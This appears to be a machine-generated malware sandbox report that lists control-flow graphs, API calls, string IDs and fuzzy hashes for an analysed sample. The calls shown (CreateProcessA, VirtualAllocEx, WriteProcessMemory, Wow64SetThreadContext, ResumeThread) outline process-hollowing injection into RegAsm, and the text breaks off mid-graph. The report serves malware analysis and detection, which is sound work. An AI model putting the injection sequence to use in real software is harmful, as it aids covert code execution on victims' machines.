6e2958 2260->2297 2301 6e2960 2260->2301 2269->2260 2270->2260 2271->2260 2272->2260 2274 6e2eb9 CreateProcessA 2273->2274 2276 6e307b 2274->2276 2278 6e2eb9 CreateProcessA 2277->2278 2280 6e307b 2278->2280 2282 6e2ce3 ReadProcessMemory 2281->2282 2284 6e2d27 2282->2284 2284->2260 2286 6e2ce3 ReadProcessMemory 2285->2286 2288 6e2d27 2286->2288 2288->2260 2290 6e2b28 VirtualAllocEx 2289->2290 2292 6e2b65 2290->2292 2292->2260 2294 6e2b28 VirtualAllocEx 2293->2294 2296 6e2b65 2294->2296 2296->2260 2298 6e29a0 ResumeThread 2297->2298 2300 6e29d1 2298->2300 2300->2260 2302 6e29a0 ResumeThread 2301->2302 2304 6e29d1 2302->2304 2304->2260 2305 6e07e8 2306 6e07ed 2305->2306 2307 6e0857 2306->2307 2308 6e0878 12 API calls 2306->2308 2308->2307

                            Executed Functions

                            Function 006E31A8 Relevance: 5.5, Strings: 4, Instructions: 537COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 6e31a8-6e31e5 1 6e31e7-6e31ed 0->1 2 6e32a4-6e32a7 1->2 3 6e31f3 1->3 2->1 11 6e32ad-6e32af 2->11 3->2 4 6e329f 3->4 5 6e326c-6e3271 3->5 6 6e31fa-6e321d 3->6 7 6e3298-6e329d 3->7 8 6e3247-6e326a 3->8 9 6e3222-6e3245 3->9 10 6e3273-6e3296 3->10 4->2 5->2 6->2 7->2 8->2 9->2 10->2 12 6e32b2-6e332c 11->12 146 6e332f call 6e2e24 12->146 147 6e332f call 6e2e30 12->147 24 6e3331-6e3333 25 6e3339-6e337f 24->25 26 6e38d1-6e38e4 24->26 31 6e38eb-6e3915 call 6e2134 25->31 33 6e3385-6e339e 25->33 26->31 31->12 54 6e391b-6e3922 31->54 138 6e33a1 call 6e2a08 33->138 139 6e33a1 call 6e2a10 33->139 35 6e33a3-6e33a5 36 6e33ab-6e33b5 35->36 37 6e38b7-6e38ca 35->37 36->31 39 6e33bb-6e33e3 36->39 37->26 144 6e33e6 call 6e2c98 39->144 145 6e33e6 call 6e2c92 39->145 42 6e33e8-6e33ea 44 6e389d-6e38b0 42->44 45 6e33f0-6e33f3 42->45 44->37 48 6e33f5-6e340b 45->48 49 6e3411-6e344e 45->49 48->49 56 6e3883-6e3896 48->56 142 6e3451 call 6e2ae8 49->142 143 6e3451 call 6e2ae0 49->143 56->44 59 6e3453-6e3458 60 6e345e-6e3478 59->60 61 6e3869-6e387c 59->61 148 6e347b call 6e2ba8 60->148 149 6e347b call 6e2ba2 60->149 61->56 63 6e347d-6e347f 65 6e384f-6e3862 63->65 66 6e3485-6e34aa 63->66 65->61 70 6e34b0-6e3523 66->70 71 6e3751-6e3776 66->71 97 6e3525-6e3527 70->97 98 6e3531-6e35aa 70->98 140 6e3779 call 6e2ba8 71->140 141 6e3779 call 6e2ba2 71->141 76 6e377b-6e377d 77 6e381b-6e382e 76->77 78 6e3783-6e37a6 76->78 89 6e3835-6e3848 77->89 78->31 82 6e37ac-6e37c4 78->82 150 6e37c7 call 6e2a08 82->150 151 6e37c7 call 6e2a10 82->151 86 6e37c9-6e37cb 87 6e37cd-6e37d9 86->87 88 6e3801-6e3814 86->88 136 6e37dc call 6e2958 87->136 137 6e37dc call 6e2960 87->137 88->77 89->65 91 6e37de-6e37e1 91->54 95 6e37e7-6e37fa 91->95 95->88 97->98 109 6e35ac-6e35ae 98->109 110 6e35b8-6e3631 98->110 109->110 118 6e363f-6e3649 110->118 119 6e3633-6e3635 110->119 120 6e373f-6e374b 118->120 121 6e364f-6e3732 118->121 119->118 120->70 120->71 152 6e3735 call 6e2ba8 121->152 153 6e3735 call 6e2ba2 121->153 135 6e3737-6e3739 135->89 135->120 136->91 137->91 138->35 139->35 140->76 141->76 142->59 143->59 144->42 145->42 146->24 147->24 148->63 149->63 150->86 151->86 152->135 153->135
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2060956683.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6e0000_AD3SI7tuzs.jbxd
                            Similarity
                            • API ID:
                            • String ID: <-]q$Ri$Ri$Ri
                            • API String ID: 0-3054688079
                            • Opcode ID: 1e7150467c74be50f22265ed34588c03e6a9b00ca2dc219311f15f4ac18b489f
                            • Instruction ID: 8a4ecac9bd5bac1a2b2a042300e6156a62b8b334eed7811acdbd7e36280a77bc
                            • Opcode Fuzzy Hash: 1e7150467c74be50f22265ed34588c03e6a9b00ca2dc219311f15f4ac18b489f
                            • Instruction Fuzzy Hash: 56128230B002158FDB48EF69C854BAEB7E7BFC8700F248569D40AAB395DE359D46CB94
                            Function 006E2E24 Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 154 6e2e24-6e2ec5 156 6e2efe-6e2f1e 154->156 157 6e2ec7-6e2ed1 154->157 164 6e2f57-6e2f86 156->164 165 6e2f20-6e2f2a 156->165 157->156 158 6e2ed3-6e2ed5 157->158 159 6e2ef8-6e2efb 158->159 160 6e2ed7-6e2ee1 158->160 159->156 162 6e2ee5-6e2ef4 160->162 163 6e2ee3 160->163 162->162 166 6e2ef6 162->166 163->162 171 6e2fbf-6e3079 CreateProcessA 164->171 172 6e2f88-6e2f92 164->172 165->164 167 6e2f2c-6e2f2e 165->167 166->159 169 6e2f30-6e2f3a 167->169 170 6e2f51-6e2f54 167->170 173 6e2f3e-6e2f4d 169->173 174 6e2f3c 169->174 170->164 185 6e307b-6e3081 171->185 186 6e3082-6e3108 171->186 172->171 175 6e2f94-6e2f96 172->175 173->173 176 6e2f4f 173->176 174->173 177 6e2f98-6e2fa2 175->177 178 6e2fb9-6e2fbc 175->178 176->170 180 6e2fa6-6e2fb5 177->180 181 6e2fa4 177->181 178->171 180->180 182 6e2fb7 180->182 181->180 182->178 185->186 196 6e310a-6e310e 186->196 197 6e3118-6e311c 186->197 196->197 198 6e3110-6e3113 call 6e106c 196->198 199 6e311e-6e3122 197->199 200 6e312c-6e3130 197->200 198->197 199->200 202 6e3124-6e3127 call 6e106c 199->202 203 6e3132-6e3136 200->203 204 6e3140-6e3144 200->204 202->200 203->204 208 6e3138-6e313b call 6e106c 203->208 205 6e3156-6e315d 204->205 206 6e3146-6e314c 204->206 209 6e315f-6e316e 205->209 210 6e3174 205->210 206->205 208->204 209->210 213 6e3175 210->213 213->213
                            APIs
                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 006E3066
                            Memory Dump Source
                            • Source File: 00000000.00000002.2060956683.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6e0000_AD3SI7tuzs.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: 2354dd038de0a274a4d47c1a7b12308ee8b1302bc723e6ebd1c56a1db8d15d05
                            • Instruction ID: 2cea9c3fb0cbe80a0c8e0078be77dbac0f41dd0fdd049bdf67c84d453e0137be
                            • Opcode Fuzzy Hash: 2354dd038de0a274a4d47c1a7b12308ee8b1302bc723e6ebd1c56a1db8d15d05
                            • Instruction Fuzzy Hash: 45A14971D0136A8FDB20CF69C855BEDBBB2BF49300F1481A9E809A7350DB749A85CF91
                            Function 006E2E30 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 214 6e2e30-6e2ec5 216 6e2efe-6e2f1e 214->216 217 6e2ec7-6e2ed1 214->217 224 6e2f57-6e2f86 216->224 225 6e2f20-6e2f2a 216->225 217->216 218 6e2ed3-6e2ed5 217->218 219 6e2ef8-6e2efb 218->219 220 6e2ed7-6e2ee1 218->220 219->216 222 6e2ee5-6e2ef4 220->222 223 6e2ee3 220->223 222->222 226 6e2ef6 222->226 223->222 231 6e2fbf-6e3079 CreateProcessA 224->231 232 6e2f88-6e2f92 224->232 225->224 227 6e2f2c-6e2f2e 225->227 226->219 229 6e2f30-6e2f3a 227->229 230 6e2f51-6e2f54 227->230 233 6e2f3e-6e2f4d 229->233 234 6e2f3c 229->234 230->224 245 6e307b-6e3081 231->245 246 6e3082-6e3108 231->246 232->231 235 6e2f94-6e2f96 232->235 233->233 236 6e2f4f 233->236 234->233 237 6e2f98-6e2fa2 235->237 238 6e2fb9-6e2fbc 235->238 236->230 240 6e2fa6-6e2fb5 237->240 241 6e2fa4 237->241 238->231 240->240 242 6e2fb7 240->242 241->240 242->238 245->246 256 6e310a-6e310e 246->256 257 6e3118-6e311c 246->257 256->257 258 6e3110-6e3113 call 6e106c 256->258 259 6e311e-6e3122 257->259 260 6e312c-6e3130 257->260 258->257 259->260 262 6e3124-6e3127 call 6e106c 259->262 263 6e3132-6e3136 260->263 264 6e3140-6e3144 260->264 262->260 263->264 268 6e3138-6e313b call 6e106c 263->268 265 6e3156-6e315d 264->265 266 6e3146-6e314c 264->266 269 6e315f-6e316e 265->269 270 6e3174 265->270 266->265 268->264 269->270 273 6e3175 270->273 273->273
                            APIs
                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 006E3066
                            Memory Dump Source
                            • Source File: 00000000.00000002.2060956683.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6e0000_AD3SI7tuzs.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: 96564e78e5543ce55e0d885b2395446258dc2e5716f814eeb8a87df362ab89f3
                            • Instruction ID: 9532e204c5119afa4f9a5bc45ce5b93f4b94369d04c7180b497549d405110ed6
                            • Opcode Fuzzy Hash: 96564e78e5543ce55e0d885b2395446258dc2e5716f814eeb8a87df362ab89f3
                            • Instruction Fuzzy Hash: 97914A71D0136A8FDB20CF69C8557EDBBB6BF49300F1481A9E809A7340DB749A85CF91
                            Function 006E2BA2 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 274 6e2ba2-6e2bf6 276 6e2bf8-6e2c04 274->276 277 6e2c06-6e2c45 WriteProcessMemory 274->277 276->277 279 6e2c4e-6e2c7e 277->279 280 6e2c47-6e2c4d 277->280 280->279
                            APIs
                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 006E2C38
                            Memory Dump Source
                            • Source File: 00000000.00000002.2060956683.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6e0000_AD3SI7tuzs.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: a0fed4c07b2b493ecfa0a8cfdc421d177cb24b2dd16f6b43231297a8b53affad
                            • Instruction ID: bcdd4b96e1c86de6a71970d395e970c08de6095f84c13eb3e8f1c8419a748491
                            • Opcode Fuzzy Hash: a0fed4c07b2b493ecfa0a8cfdc421d177cb24b2dd16f6b43231297a8b53affad
                            • Instruction Fuzzy Hash: 46212AB59003499FCB10CFAAC985BEEBFF5FF48310F108429E519A7251D7789945CBA0
                            Function 006E2BA8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 284 6e2ba8-6e2bf6 286 6e2bf8-6e2c04 284->286 287 6e2c06-6e2c45 WriteProcessMemory 284->287 286->287 289 6e2c4e-6e2c7e 287->289 290 6e2c47-6e2c4d 287->290 290->289
                            APIs
                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 006E2C38
                            Memory Dump Source
                            • Source File: 00000000.00000002.2060956683.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6e0000_AD3SI7tuzs.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: de9e8cace75e161f74d19cd80e60ffa01999847b1d895a3768511167952739c0
                            • Instruction ID: 0ab306101b5a6eb9b08495709d8630274323327389ac4c3f3252251d42816c34
                            • Opcode Fuzzy Hash: de9e8cace75e161f74d19cd80e60ffa01999847b1d895a3768511167952739c0
                            • Instruction Fuzzy Hash: 352139B59003499FCB10DFAAC985BEEBBF6FF48310F108429E919A7240D7789945CBA0
                            Function 006E2A08 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 294 6e2a08-6e2a5b 296 6e2a5d-6e2a69 294->296 297 6e2a6b-6e2a9b Wow64SetThreadContext 294->297 296->297 299 6e2a9d-6e2aa3 297->299 300 6e2aa4-6e2ad4 297->300 299->300
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 006E2A8E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2060956683.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6e0000_AD3SI7tuzs.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: 637e3668a90e47c95d7460bec6caa596f5ae0d11a83bef52d2e6f05b6418a106
                            • Instruction ID: 03a3332718f75269c9bf25625b57f9e21fbc129609cde3055fe62d61ad98385c
                            • Opcode Fuzzy Hash: 637e3668a90e47c95d7460bec6caa596f5ae0d11a83bef52d2e6f05b6418a106
                            • Instruction Fuzzy Hash: F32148B19003498FDB10DFAAC4857EEBBF5AF48314F14842ED459A7241C7789945CFA1
                            Function 006E2C92 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 304 6e2c92-6e2d25 ReadProcessMemory 307 6e2d2e-6e2d5e 304->307 308 6e2d27-6e2d2d 304->308 308->307
                            APIs
                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 006E2D18
                            Memory Dump Source
                            • Source File: 00000000.00000002.2060956683.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6e0000_AD3SI7tuzs.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            • Opcode ID: 88b836161413e626358b54483ffb0cc9f3ebd412ddfee3bb27a199d436855264
                            • Instruction ID: d128b43d2ec03a5a83435da50a620b6c571c7488a05515b9f3599d1cd15281d2
                            • Opcode Fuzzy Hash: 88b836161413e626358b54483ffb0cc9f3ebd412ddfee3bb27a199d436855264
                            • Instruction Fuzzy Hash: 252114B5D003499FCB10DFAAD880AEEBBF5FF48310F50842AE519A7250C7789945CBA1
                            Function 006E2A10 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 312 6e2a10-6e2a5b 314 6e2a5d-6e2a69 312->314 315 6e2a6b-6e2a9b Wow64SetThreadContext 312->315 314->315 317 6e2a9d-6e2aa3 315->317 318 6e2aa4-6e2ad4 315->318 317->318
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 006E2A8E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2060956683.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6e0000_AD3SI7tuzs.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: e5eda9ffe2828556c0b3aeddaf554ceb1e38a2ad558f62ee5345c495fe8262f9
                            • Instruction ID: 4eb02d3c00f2d05abdd3ccc67cb6d29022564d2c680f94da98c938c20683cfc5
                            • Opcode Fuzzy Hash: e5eda9ffe2828556c0b3aeddaf554ceb1e38a2ad558f62ee5345c495fe8262f9
                            • Instruction Fuzzy Hash: 162115B19003098FDB20DFAEC4857EEBBF5EF48314F14842AD519A7240CB78A945CFA1
                            Function 006E2C98 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 322 6e2c98-6e2d25 ReadProcessMemory 325 6e2d2e-6e2d5e 322->325 326 6e2d27-6e2d2d 322->326 326->325
                            APIs
                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 006E2D18
                            Memory Dump Source
                            • Source File: 00000000.00000002.2060956683.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6e0000_AD3SI7tuzs.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            • Opcode ID: 839975a58f02dda029bd8b7246ea93f7a27789ba9df295f67babbb126e13ad8b
                            • Instruction ID: 050287bc4070ca956172851de031a43c0276e04dda0ec5af5fa8d7b7503b19c0
                            • Opcode Fuzzy Hash: 839975a58f02dda029bd8b7246ea93f7a27789ba9df295f67babbb126e13ad8b
                            • Instruction Fuzzy Hash: 552138B1C003499FCB10DFAAC880AEEFBF5FF48310F50842AE519A7240C778A944CBA0
                            Function 006E2AE0 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 330 6e2ae0-6e2b63 VirtualAllocEx 333 6e2b6c-6e2b91 330->333 334 6e2b65-6e2b6b 330->334 334->333
                            APIs
                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 006E2B56
                            Memory Dump Source
                            • Source File: 00000000.00000002.2060956683.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6e0000_AD3SI7tuzs.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 151c363afcd8d57fe6aacb3cebce7c6a2acc1823ce0b00a8c079a57a7e08b308
                            • Instruction ID: 92487bb0b83fd55b6c89eaf3d0b8fde58a04fff99adbeb8a103e853d5a385736
                            • Opcode Fuzzy Hash: 151c363afcd8d57fe6aacb3cebce7c6a2acc1823ce0b00a8c079a57a7e08b308
                            • Instruction Fuzzy Hash: 5D1159759002499FCB10DFAAD845AEFBFF6EF48310F248419D51AA7250C7799544CFA1
                            Function 006E2AE8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 338 6e2ae8-6e2b63 VirtualAllocEx 341 6e2b6c-6e2b91 338->341 342 6e2b65-6e2b6b 338->342 342->341
                            APIs
                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 006E2B56
                            Memory Dump Source
                            • Source File: 00000000.00000002.2060956683.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6e0000_AD3SI7tuzs.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 8a797d3a8fedaab3a0058134c73c002609cf080905f5b2cba9e34c63670e8044
                            • Instruction ID: d3b2e158aba476bb79712c9a070bb6eb14eac7c659dca08bb7f3cf04ffdb4dbf
                            • Opcode Fuzzy Hash: 8a797d3a8fedaab3a0058134c73c002609cf080905f5b2cba9e34c63670e8044
                            • Instruction Fuzzy Hash: 451137759002499FCB10DFAAC844AEFBFF6EF48314F208419E519A7250C779A940CFA0
                            Function 006E2958 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 346 6e2958-6e29cf ResumeThread 349 6e29d8-6e29fd 346->349 350 6e29d1-6e29d7 346->350 350->349
                            APIs
                            • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,6984B800), ref: 006E29C2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2060956683.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6e0000_AD3SI7tuzs.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 5ff405ad53495f394cd78a9c42e027c6c44f601102a5c268dc9bee87af26c218
                            • Instruction ID: 19209c3f4e2bb62dd37f939f819b456a52ec7c1d244afda18bc07ec24059d10d
                            • Opcode Fuzzy Hash: 5ff405ad53495f394cd78a9c42e027c6c44f601102a5c268dc9bee87af26c218
                            • Instruction Fuzzy Hash: 871146B5D003498ECB20DFAAC4456EEFFF5EF88314F20841AC519A7241CB78A945CFA0
                            Function 006E2960 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 354 6e2960-6e29cf ResumeThread 357 6e29d8-6e29fd 354->357 358 6e29d1-6e29d7 354->358 358->357
                            APIs
                            • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,6984B800), ref: 006E29C2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2060956683.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6e0000_AD3SI7tuzs.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 0a97007b6b5487921713f9b2449cc52659f3a5dccf3bde468e5080077c59b2a3
                            • Instruction ID: d077c9cab46c085b0a200a9524bd8c637987ab75666c997441c7c17be11068bc
                            • Opcode Fuzzy Hash: 0a97007b6b5487921713f9b2449cc52659f3a5dccf3bde468e5080077c59b2a3
                            • Instruction Fuzzy Hash: 1B1128B19003498BDB20DFAAC4457EEFBF9EF88314F208419D519A7240CB79A944CBA0
                            Function 0068D7F1 Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2060834462.000000000068D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0068D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_68d000_AD3SI7tuzs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 11d8706e52956d9579f58e5ab74e72fd18926222363ecae0a7598e0eb82af3ec
                            • Instruction ID: 65c2d6d0ab20e33a7642c27db7679eeec4f57c8d66ab01d01c89dc49104e5352
                            • Opcode Fuzzy Hash: 11d8706e52956d9579f58e5ab74e72fd18926222363ecae0a7598e0eb82af3ec
                            • Instruction Fuzzy Hash: 06012BB10043049AE7209B55CD84B67BFDDEF85324F18C629ED090A2C2C3389800C7B1
                            Function 0068D7F0 Relevance: .0, Instructions: 36COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2060834462.000000000068D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0068D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_68d000_AD3SI7tuzs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 52b50e33c7d2eee6061c912da2b0399820d12ca618f8a97635b07df124c0e48d
                            • Instruction ID: bda51d74aff9f7358fda5fedba90b03dc41166a99c155a149b5341faf32fa189
                            • Opcode Fuzzy Hash: 52b50e33c7d2eee6061c912da2b0399820d12ca618f8a97635b07df124c0e48d
                            • Instruction Fuzzy Hash: 0BF0C2714043449EE7208B06D884BA2FFACEF91734F18C55AED480B282C2799840CB70

                            Execution Graph

                            Execution Coverage:2.1%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:40.7%
                            Total number of Nodes:59
                            Total number of Limit Nodes:5
                            execution_graph 12349 409ee0 12350 409ee8 12349->12350 12351 409eee GetCurrentProcess 12350->12351 12358 409eec ExitProcess 12350->12358 12353 409ef9 12351->12353 12354 409eff GetWindowInfo 12353->12354 12359 409efd 12353->12359 12363 40ad60 12354->12363 12357 409f1e 12357->12359 12368 40d5b0 12357->12368 12372 435710 12359->12372 12367 40adb5 12363->12367 12364 40b298 CoInitializeEx 12365 40b2aa CoInitializeSecurity 12364->12365 12366 40b2ca 12364->12366 12365->12366 12366->12357 12367->12364 12367->12366 12371 40d5ef 12368->12371 12369 40da24 GetSystemDirectoryW 12369->12371 12370 40daa8 12371->12369 12371->12370 12375 436970 12372->12375 12374 435715 FreeLibrary 12374->12358 12376 436979 12375->12376 12376->12374 12377 435872 12378 435885 12377->12378 12379 435965 12377->12379 12384 435c64 12377->12384 12385 435c53 12377->12385 12379->12384 12379->12385 12388 435c1e 12379->12388 12396 435810 LdrInitializeThunk 12379->12396 12380 435c5d 12381 435e0c 12382 43610f 12392 436198 12382->12392 12401 435810 LdrInitializeThunk 12382->12401 12383 435fec 12399 435810 LdrInitializeThunk 12383->12399 12386 435d02 12384->12386 12398 435810 LdrInitializeThunk 12384->12398 12385->12380 12385->12385 12397 435810 LdrInitializeThunk 12385->12397 12386->12381 12386->12382 12386->12383 12386->12392 12388->12384 12388->12385 12400 435810 LdrInitializeThunk 12392->12400 12395 43627b 12396->12388 12397->12380 12398->12386 12399->12381 12400->12395 12401->12392 12402 40bdf1 12403 40bb57 12402->12403 12405 40bbe4 12402->12405 12403->12405 12406 435730 12403->12406 12407 4357d0 12406->12407 12408 43574a 12406->12408 12407->12403 12408->12407 12409 4357b0 RtlReAllocateHeap 12408->12409 12409->12407 12410 437a10 12412 437a30 12410->12412 12411 437b8e 12412->12411 12414 435810 LdrInitializeThunk 12412->12414 12414->12411 12415 433616 12416 43367d 12415->12416 12418 433624 12415->12418 12417 43366c RtlFreeHeap 12417->12416 12418->12417 12418->12418 12419 40c608 12420 40c28f 12419->12420 12421 435730 RtlReAllocateHeap 12420->12421 12422 40c374 12420->12422 12421->12420

                            Executed Functions

                            Function 00435872 Relevance: 9.6, Strings: 7, Instructions: 800COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: %sgh$4`[b$4`[b$=:;8$=:;8$@$S\C
                            • API String ID: 0-2673850493
                            • Opcode ID: 6f9836782bf96116eb64915601758e8cbeb440134678e8e57faef14dbd961d17
                            • Instruction ID: 95b815d2e374ad23a9f143f819f0847ff84a2c448ad1ced2e865ddee21b81f3a
                            • Opcode Fuzzy Hash: 6f9836782bf96116eb64915601758e8cbeb440134678e8e57faef14dbd961d17
                            • Instruction Fuzzy Hash: D74268B8208341DBD308DF18D990A2BB7F1FF8A305F54992DE5C6873A1C779A815CB5A
                            Function 0040B550 Relevance: 6.7, Strings: 5, Instructions: 429COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 280 40b550-40b58f 281 40b591 280->281 282 40b5d3-40b6e6 280->282 283 40b5a0-40b5d1 281->283 284 40b720-40b75c 282->284 285 40b6e8 282->285 283->282 283->283 287 40b793-40b7ae call 40c280 284->287 288 40b75e-40b75f 284->288 286 40b6f0-40b71e 285->286 286->284 286->286 292 40b8f4-40b8f6 287->292 293 40b7b4-40b7da 287->293 289 40b760-40b791 288->289 289->287 289->289 296 40bae2-40baec 292->296 294 40b81b-40b821 293->294 295 40b7dc-40b7df 293->295 298 40b830-40b83a 294->298 297 40b7e0-40b819 295->297 297->294 297->297 299 40b841-40b849 298->299 300 40b83c-40b83f 298->300 301 40bad2-40bade call 433600 299->301 302 40b84f-40b873 299->302 300->298 300->299 301->296 304 40b875 302->304 305 40b8ae-40b8b9 302->305 306 40b880-40b8ac 304->306 308 40b8fb 305->308 309 40b8bb-40b8bf 305->309 306->305 306->306 311 40b8fd-40b8ff 308->311 310 40b8d7-40b8db 309->310 312 40b8e1-40b8e8 310->312 313 40baca 310->313 311->313 314 40b905-40b942 311->314 315 40b8ea-40b8ec 312->315 316 40b8ee 312->316 313->301 317 40b944 314->317 318 40b97e-40b989 314->318 315->316 321 40b8d0-40b8d5 316->321 322 40b8f0-40b8f2 316->322 323 40b950-40b97c 317->323 319 40b9c4 318->319 320 40b98b-40b993 318->320 325 40b9c6-40b9c8 319->325 324 40b9a7-40b9ab 320->324 321->310 321->311 322->321 323->318 323->323 324->313 326 40b9b1-40b9b8 324->326 325->313 327 40b9ce-40b9e4 325->327 328 40b9ba-40b9bc 326->328 329 40b9be 326->329 330 40ba21-40ba27 327->330 331 40b9e6 327->331 328->329 332 40b9a0-40b9a5 329->332 333 